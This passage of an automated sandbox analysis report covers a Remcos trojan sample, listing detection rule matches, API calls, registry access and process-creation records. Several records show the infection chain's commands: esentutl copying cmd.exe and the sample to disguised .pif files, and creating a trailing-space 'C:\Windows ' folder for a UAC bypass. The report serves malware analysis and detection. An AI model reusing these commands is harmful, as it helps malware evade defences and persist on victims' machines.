                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0321798D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E9798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,21_2_02E9798D
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C97FD2 GetDiskFreeSpaceA,0_2_02C97FD2
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0320F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0320F4AF
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA6DC8 CoCreateInstance,0_2_02CA6DC8
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0321B539
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0321AB9E
                Source: C:\Users\user\Desktop\nft438A5fN.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4280
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1376
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\24e0cc18-8175-4616-8ea9-89ad3c39c315Jump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\nft438A5fN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: nft438A5fN.exeReversingLabs: Detection: 57%
                Source: nft438A5fN.exeVirustotal: Detection: 68%
                Source: C:\Users\user\Desktop\nft438A5fN.exeFile read: C:\Users\user\Desktop\nft438A5fN.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\nft438A5fN.exe "C:\Users\user\Desktop\nft438A5fN.exe"
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
                Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: unknownProcess created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
                Source: unknownProcess created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
                Source: C:\Windows\SysWOW64\SndVol.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "Jump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /oJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: url.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeSection loaded: amsi.dllJump to behavior
